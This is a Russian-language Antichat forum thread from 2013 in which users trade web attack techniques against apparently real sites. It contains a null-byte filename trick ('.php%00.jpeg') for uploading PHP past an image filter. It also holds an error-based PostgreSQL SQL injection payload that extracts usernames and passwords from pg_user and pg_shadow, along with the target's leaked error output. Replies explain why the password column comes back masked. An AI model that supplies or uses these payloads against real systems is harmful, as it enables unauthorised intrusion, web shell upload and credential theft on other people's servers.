HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.10.2013, 15:18
wanttoask
Познающий
Регистрация: 30.09.2012
Сообщений: 81
Провел на форуме:
29758

Репутация: 0
По умолчанию

Можно заставить файл аплоад думать, что я загружаю пнг/джпг и загружать пхп?
 
Ответить с цитированием

  #2  
Старый 13.10.2013, 15:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Всё зависит от настроек сервера и кода скрипта.

Можешь например тут почитать: https://rdot.org/forum/showpost.php?p=1142&postcount=5

P.S. По мотивам оригинального вопроса вспомнился этот пост: /showpost.php?p=1473083&postcount=13

Пожалуйста
 
Ответить с цитированием

  #3  
Старый 13.10.2013, 15:26
wanttoask
Познающий
Регистрация: 30.09.2012
Сообщений: 81
Провел на форуме:
29758

Репутация: 0
По умолчанию

Спасибо
 
Ответить с цитированием

  #4  
Старый 13.10.2013, 15:40
wanttoask
Познающий
Регистрация: 30.09.2012
Сообщений: 81
Провел на форуме:
29758

Репутация: 0
По умолчанию

Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?
 
Ответить с цитированием

  #5  
Старый 13.10.2013, 17:45
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от wanttoask  
Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?
Переименовать в *.php - отсекает jpeg с гарантией.

Каков вопрос - таков и ответ.
 
Ответить с цитированием

  #6  
Старый 16.10.2013, 02:26
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
Провел на форуме:
17560

Репутация: 0
По умолчанию

Два раза подряд нахожу SQL inj в PostgreSQL

И никак не пойму почему при таком запросе:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_user+LIMIT+1+OFFSET+1)+as+int)--

выдает:

Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160

пароль под звездочками...!

Что не так?

П.с.g_shadow - доступа нет.

брал аналогию запроса:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_shadow+LIMIT+1+OFFSET+1)+as+int)--

Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139
 
Ответить с цитированием

  #7  
Старый 16.10.2013, 03:13
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266

Репутация: 53


По умолчанию

Цитата:
Сообщение от Always  
Два раза подряд нахожу SQL inj в PostgreSQL
И никак не пойму почему при таком запросе:
'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_user+LIMIT+1+OFFSET+1)+as+int)--
выдает:
Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160
пароль под звездочками...!
Что не так?
П.с.
g_shadow - доступа нет.
брал аналогию запроса:
'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_shadow+LIMIT+1+OFFSET+1)+as+int)--
Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139
Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).
 
Ответить с цитированием

  #8  
Старый 17.10.2013, 04:04
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
Провел на форуме:
17560

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).
Тогда получается, что получить данные практически невозможно?
 
Ответить с цитированием

  #9  
Старый 17.10.2013, 14:50
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266

Репутация: 53


По умолчанию

Цитата:
Сообщение от Always  
Тогда получается, что получить данные практически невозможно?
Какие данные?
 
Ответить с цитированием

  #10  
Старый 18.10.2013, 08:21
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от wanttoask  
Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?
.php%00.jpeg
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.